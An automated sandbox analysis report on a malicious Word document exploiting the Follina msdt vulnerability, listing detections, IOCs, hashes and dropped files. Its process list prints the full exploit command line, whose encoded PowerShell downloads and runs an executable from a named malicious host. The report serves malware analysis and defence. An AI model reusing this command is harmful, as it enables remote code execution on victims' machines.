Windows
Analysis Report
Court Fine.doc
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- WINWORD.EXE (PID: 6316 cmdline:
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
- MSOSYNC.EXE (PID: 6464 cmdline:
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
- msdt.exe (PID: 5804 cmdline:
C:\Windows \system32\ msdt.exe" ms-msdt:/i d PCWDiagn ostic /ski p force /p aram "IT_R ebrowseFor File=cal?c IT_Launch Method=Con textMenu I T_SelectPr ogram=NotL isted IT_B rowseForFi le=h$(Invo ke-Express ion($(Invo ke-Express ion('[Syst em.Text.En coding]'+[ char]58+[c har]58+'UT F8.GetStri ng([System .Convert]' +[char]58+ [char]58+' FromBase64 String('+[ char]34+'R 2V0LVByb2N lc3MgLU5hb WUgbXNkdHx TdG9wLVByb 2Nlc3M7cG9 3ZXJzaGVsb CAtbm9wIC1 jIE5ldy1Jd GVtIC1QYXR oICJDOlwiI C1OYW1lICJ 0ZW1wIiAtS XRlbVR5cGU gRGlyZWN0b 3J5CihOZXc tT2JqZWN0I FN5c3RlbS5 OZXQuV2ViQ 2xpZW50KS5 Eb3dubG9hZ EZpbGUoImh 0dHBzOi8vY WttYWxyZWx vYWQuY29tL 3N0cnVrL3B yb2plY3QuZ XhlIiwiQzp cdGVtcFxwc m9qZWN0LmV 4ZSIpClN0Y XJ0LVByb2N lc3MgKCJDO lx0ZW1wXHB yb2plY3QuZ XhlIik='+[ char]34+') )'))))i/.. /../../../ ../../../. ./../../.. /../../../ Windows/Sy stem32/mps igstub.exe IT_AutoTr oubleshoot =ts_AUTO MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
- csc.exe (PID: 3620 cmdline:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xjziuml\5xjziuml.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
- cvtres.exe (PID: 1100 cmdline:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E28.tmp" "c:\Users\user\AppData\Local\Temp\5xjziuml\CSCF16D2975B7774203A88B71A973285B7C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 5100 cmdline:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0e51okyq\0e51okyq.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
- cvtres.exe (PID: 4008 cmdline:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES995A.tmp" "c:\Users\user\AppData\Local\Temp\0e51okyq\CSCC7D9E81B474B42B68F5EB6CB9C3BA6BD.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- powershell.exe (PID: 5176 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c New-Item -Path C:\ -Name temp -ItemType Directory MD5: DBA3E6449E97D4E3DF64527EF7012A10)
- cleanup
Rule | Description | Author |
---|---|---|
SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak |
INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents | ditekSHen |
Rule | Description | Author |
---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Rule | Description | Author |
---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
Rule | Description | Author |
---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Signature sections:
- AV Detection
- Exploits
- Software Vulnerabilities
- System Summary
- Persistence and Installation Behavior
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 23 Exploitation for Client Execution | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
44% | ReversingLabs | Document-Word.Trojan.Heuristic |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
akmalreload.com | 172.67.190.5 | true | true | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.67.190.5 | akmalreload.com | United States | | 13335 | CLOUDFLARENETUS | true |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 671073 |
Start date and time: | 2022-07-21 14:33:27 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 52s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Court Fine.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 31 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winDOC@12/27@3/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.109.88.191, 52.109.76.35, 52.109.88.40, 40.125.122.176, 20.189.173.21, 52.242.101.226, 20.223.24.244, 52.152.110.14, 20.54.89.106
- Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- VT rate limit hit for: Court Fine.doc
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
172.67.190.5 | Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ce5f3254611a8c095a3d821d44539877 | Get hash | malicious | Browse |
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Windows\Temp\SDIAG_25925c22-fa60-496e-82b8-a63566c71bc1\DiagPackage.dll | Get hash | malicious | Browse | ||
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 528384 |
Entropy (8bit): | 0.47571326717584517 |
Encrypted: | false |
SSDEEP: | 384:/GfX0CUJCmg8SF1fZ0jGBg2aFfWWbwtZ1IM+hVZO4Fg:efXwCVHhZWFOWb/XI |
MD5: | 0A2C069AD707F992B9E6BC400F86811D |
SHA1: | BE6E33C5C1D3E7B4687E234BD2F9DEC74730442B |
SHA-256: | DB52D7049DE5191AC0D545F49E1289042DB4B41DCA84EDA1AC684AFA68DF6218 |
SHA-512: | 1ADACEB49A5616E13C2F8749186C198599326B5A65680052136FC44028D1CFF5FE747319974D1197F0328E567120C09877D02038423D0AB7074FB3CC54F720E3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 36 |
Entropy (8bit): | 2.730660070105504 |
Encrypted: | false |
SSDEEP: | 3:5NixJlElGUR:WrEcUR |
MD5: | 1F830B53CA33A1207A86CE43177016FA |
SHA1: | BDF230E1F33AFBA5C9D5A039986C6505E8B09665 |
SHA-256: | EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF |
SHA-512: | 502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.3860360556164644 |
Encrypted: | false |
SSDEEP: | 3:QXTFFFdaV:QXJVu |
MD5: | D34B8A9AC2D99FE6548198BBD705AC75 |
SHA1: | 3010EE9F1C61AEC5D83DF4807C6F35B826E42424 |
SHA-256: | 37261808F63256D3215266946569D27A1F4BB52A800345AB4E04A7F4458DA4FE |
SHA-512: | 9AAFEFF80115A2C1F00909C8BAD7143A856A5228186E19D4347EBDCB3EC658E256C2DA71EEDC3941DBB9882E02FAE479E5E2B72ED4E35252B3B8209CA82CC4F0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4BB7C654-D425-4C33-A395-61834046706D
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 149077 |
Entropy (8bit): | 5.356737748338348 |
Encrypted: | false |
SSDEEP: | 1536:PcQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvid3XxBETLKz6e:OJQ9DQC+zPXwI |
MD5: | 611C898B25966837F55025A540F38CDC |
SHA1: | BB7220D67A8597BBCDCD2F9E83847DE834C6BE2B |
SHA-256: | AF401B55BA232DC415DFD6F6A144133B53B5982C1B9CA5FA0387567FC4F92D47 |
SHA-512: | EED548A1A851111BA8DF87F6A2E4D5722BD49ADFC50D29E4DFF87B267233764A1103CE98AB2FAC9EAE4A738EF71094EA91DA0764B9A3829E1FF1072D5A454CC7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 7275 |
Entropy (8bit): | 5.573158632495138 |
Encrypted: | false |
SSDEEP: | 48:Ye+xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ68:vUP+miLSAwD |
MD5: | CDD33FFA502CBFFEC6E64C4574846A89 |
SHA1: | 4E57B2D731513551B26F684B3D2871EB0F8CC14D |
SHA-256: | 5C632292394979EBF07B47CC5F9DD62A04C53CFF3F6C85FA26D259612D010F75 |
SHA-512: | 1A780ACF25E4B765BEB5FD34A587BBDD5991344BB0E075989192327C48EBD345BF9BD194CDF1BD0D5F13DCBB2E3BE035AB59283685D3FB3DC186B264EC6375BB |
Malicious: | true |
Yara Hits: |
|
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{86E9AFD0-3AEB-4A8A-B1B8-9AD364CDD22E}.tmp
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{FE3CC2CB-584B-4D5D-A293-44365A85A783}.tmp
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 0.8065410214023134 |
Encrypted: | false |
SSDEEP: | 6:olgI5lNcY2Iel5E7l8iIjJ0dYB4PxZUtLamN:4v2iBUJEZw |
MD5: | 712D5A8CE10E91EFED4B1A1EB41849F5 |
SHA1: | 7E2D68210C45F13D42BE4734453389AB8D0B70D4 |
SHA-256: | 8C7D470BB5E3723F9CBAD381111A09AABBE71BE27906316A2E671409B90B3F8D |
SHA-512: | FB36BEA5A5BF60846AF25CBE2F3EDF348EC2A64013A3230811566A76E8465616426109B9D6BF5AEEE9DE0F783C660551D03CE90752B97D481D4D91266F4A2E6A |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 7275 |
Entropy (8bit): | 5.573158632495138 |
Encrypted: | false |
SSDEEP: | 48:Ye+xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ68:vUP+miLSAwD |
MD5: | CDD33FFA502CBFFEC6E64C4574846A89 |
SHA1: | 4E57B2D731513551B26F684B3D2871EB0F8CC14D |
SHA-256: | 5C632292394979EBF07B47CC5F9DD62A04C53CFF3F6C85FA26D259612D010F75 |
SHA-512: | 1A780ACF25E4B765BEB5FD34A587BBDD5991344BB0E075989192327C48EBD345BF9BD194CDF1BD0D5F13DCBB2E3BE035AB59283685D3FB3DC186B264EC6375BB |
Malicious: | true |
Yara Hits: |
|
IE Cache URL: | https://akmalreload.com/struk/wellcome.html |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 3.093108375291108 |
Encrypted: | false |
SSDEEP: | 48:6QIpqb927GslPg1DRjyJCO7dk1ul/a3Tq:xbc7GHxO5nNK |
MD5: | E19EE91E755D028BA21483F98B88843E |
SHA1: | 247B906AF7D343B6AC43C8A1F2921BD20B9853EB |
SHA-256: | 3F5470FE931AB6B9278CEAF18B49905FAE0961412DC8316838991E8B3066B552 |
SHA-512: | 47CC7B513BB1F779D495D790AE25B14B3A3D8FA600523F79EACB0F202C9DC7F91EFF1173E4C24D6D7B4A0DDA265656F0E735DF394F8B15AFDD45093770CADBA0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.105494291887545 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryaKWUTak7YnqqhKWU8PN5Dlq5J:+RI+ycuZhNQGakShXPNnqX |
MD5: | 73D4122E3FC352EBCD2C85F7DDA8D695 |
SHA1: | 6671C842E7145EA8CD6FDA964C575B4C038BCEE1 |
SHA-256: | C05AA2387D31CB368A346BB8D041C6A257E5ABCD6C06574C7B8DE21130C620AE |
SHA-512: | E19D20B242B0CFF41E10452EFD9162EC151477BCBC26821DDC42C183C9BADD4EE92202BF80109DCF7C84BFD562AC420D2F54883A1521705490C48AEDA722DDE2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5120 |
Entropy (8bit): | 3.789165757370609 |
Encrypted: | false |
SSDEEP: | 48:63goPhmKraYZkH8KTibUyUkwjj0JTC+CFSlwY9xc1ul0Ra3lqq:6fDaAkHHoek8aCuTGK |
MD5: | BD70B767EC8DB8CE7284CCFA33944017 |
SHA1: | 921203481746AC4E6E54243A3FA53C5EBFFFB94D |
SHA-256: | 174108ECC0B12DD8F7469481DB9D0FFBBDBCEEC2E2923EDD8A822454F8C880B9 |
SHA-512: | DF16FA023FEB9B1E09DC984203A159564D9DB584ED81DAA915B5A2B2442B34811F6F274945E11A96911E78B2A969F8FBD621157CD39A9441B1E5661C7C870812 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1127031978119892 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryeRak7YnqqlWPN5Dlq5J:+RI+ycuZhN0RakSlWPNnqX |
MD5: | DADF14848ACE54C9225C4322CB1C036B |
SHA1: | 9CD2353991FA1CA0D2903700D5934A3119141E0C |
SHA-256: | 45A3EBB82DF6B86370AAE592FCDEB84CD2ABF1CB96834C618C51C265C061D7E4 |
SHA-512: | 00B6379DDDB1E0D9703ECB3078364B288B2D7F14A7927F6B013CA7047113FD32B52B040CDEB362F179E785D3A8A3BF9B29B62261A22AFC53589ABBED0663DAE8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1364 |
Entropy (8bit): | 4.130682089257403 |
Encrypted: | false |
SSDEEP: | 24:H/C9A+gZRlqKhH4hKJ+rfII+ycuZhN0RakSlWPNnq9Wd:PfZnqOaKJYg1ul0Ra3lqq9m |
MD5: | 3485CBE671AF24BDF143BE3F5B170FF9 |
SHA1: | A96BBF9A029C12EED4FFC246773DB7FAAACE8C9C |
SHA-256: | 4836A9DB741085DD819BB9C2D915FD07EFBA68284F8F406C9FDD336447165736 |
SHA-512: | 0B3F08986F9B618CF01200DAB26168B5680F91E77FEE97C7AFE4445E85EA75A6C10AC963B5C46E9B2653DC3CDE467A8D03F692F057FAE09984756E1E25B0B7EF |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1364 |
Entropy (8bit): | 4.126071622522005 |
Encrypted: | false |
SSDEEP: | 24:H2C9A+g+R4KhHrFhKJ+rfII+ycuZhNQGakShXPNnq9Wd:UfMvKJYg1ul/a3Tq9m |
MD5: | EED7A529D864DC8DD626AB08A41704A6 |
SHA1: | EBB28DDDB5740CCCE5CA4130E0C4556953A84DE2 |
SHA-256: | 0697639850A70B8A9EC6E694537CE3F5C0C9D48A2F4182FA438941C1E91B6492 |
SHA-512: | A9DC5B0BE4ACEFA7A2745D60AB6EE16FDD2CB43F0E1AA1605A1F9850209F204899757B1B15B83107E73943ABEE0BC5037E23B9A85B931E16BFDB4ABC554543ED |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1055 |
Entropy (8bit): | 4.724536658205826 |
Encrypted: | false |
SSDEEP: | 12:8bko6W0UtpuElPCH2GgQEM43YM092v+WyQcmgSKJjA6N/yhCD2h5z4t2Y+xIBjKU:8Ao9a/CcmgTA6NwCDQj7aB6m |
MD5: | 366F03D504A9C71F01FEB3B7513DE105 |
SHA1: | 9475781F2E8216DB81AF766C08392720ADD5995A |
SHA-256: | 231AAB4BFBB0BD6FF93E26971D03DDD6430160F48388AEAB2A2C746456D152BF |
SHA-512: | 8C0ED33608CE6319C0813AC58DE7C9D33465187CEE25FE224D2AB5E7468E3549A883A03C5D31D552BF8175EC38FE5D9C774341EFD79A704F8488182497D268D4 |
Malicious: | true |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 79 |
Entropy (8bit): | 4.6836866099570775 |
Encrypted: | false |
SSDEEP: | 3:bDuMJl+uutCmX19RutCv:bC00l0s |
MD5: | 942A337F9F76C8DA2AC4AECA0E83B3AC |
SHA1: | 750D00CFF2D8A7EB92AB03089C4C7486CD1B951C |
SHA-256: | 5D6198E4FA64796F7769A1D1148C455651E0767A17D1468BE45D3601E6FE8D22 |
SHA-512: | 19E29234FD72E907B920FAA1F88D9109F4E436E9B080AF166847AAD5B60B55AB05BAF405E36980B026F35240BBAB8E8249D3043BB4D2945ECD57D18FF89F27D4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.1614131675336328 |
Encrypted: | false |
SSDEEP: | 3:Rl/ZdaZt7KwhlD7lqKlWE:RtZ4Zb6+L |
MD5: | 06ADEDBFC284DA1097B11B2A89AEF7D5 |
SHA1: | A145BE7642936217069C6A29132BAC7E7AB23D8B |
SHA-256: | BB3700C9108FA31437D26BC515CCB4116B7DDF14F37800FCAC1A3534B6CC31A2 |
SHA-512: | 547980D2B7BC2127867B145208D9E3E062CA4ED8A3A7D30E0115BC89107D6C355895001C8984F87CA7F750C0936DE9104AEAEAF99B0F97E0FDF16D159E3CCBE1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 24702 |
Entropy (8bit): | 4.37978533849437 |
Encrypted: | false |
SSDEEP: | 96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW |
MD5: | 191959B4C3F91BE170B30BF5D1BC2965 |
SHA1: | 1891E3CB588516B94FDC53794DA4DF5469A4C6D0 |
SHA-256: | 8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047 |
SHA-512: | 092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66560 |
Entropy (8bit): | 6.926109943059805 |
Encrypted: | false |
SSDEEP: | 1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx |
MD5: | 6E492FFAD7267DC380363269072DC63F |
SHA1: | 3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3 |
SHA-256: | 456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8 |
SHA-512: | 422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E |
Malicious: | false |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
C:\Windows\Temp\SDIAG_25925c22-fa60-496e-82b8-a63566c71bc1\RS_ProgramCompatibilityWizard.ps1
Process: | C:\Windows\SysWOW64\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 50242 |
Entropy (8bit): | 4.932919499511673 |
Encrypted: | false |
SSDEEP: | 384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4 |
MD5: | EDF1259CD24332F49B86454BA6F01EAB |
SHA1: | 7F5AA05727B89955B692014C2000ED516F65D81E |
SHA-256: | AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27 |
SHA-512: | A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0 |
Malicious: | false |
Preview: |
C:\Windows\Temp\SDIAG_25925c22-fa60-496e-82b8-a63566c71bc1\TS_ProgramCompatibilityWizard.ps1
Process: | C:\Windows\SysWOW64\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16946 |
Entropy (8bit): | 4.860026903688885 |
Encrypted: | false |
SSDEEP: | 384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww |
MD5: | 2C245DE268793272C235165679BF2A22 |
SHA1: | 5F31F80468F992B84E491C9AC752F7AC286E3175 |
SHA-256: | 4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0 |
SHA-512: | AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C |
Malicious: | false |
Preview: |
C:\Windows\Temp\SDIAG_25925c22-fa60-496e-82b8-a63566c71bc1\VF_ProgramCompatibilityWizard.ps1
Process: | C:\Windows\SysWOW64\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 453 |
Entropy (8bit): | 4.983419443697541 |
Encrypted: | false |
SSDEEP: | 12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr |
MD5: | 60A20CE28D05E3F9703899DF58F17C07 |
SHA1: | 98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9 |
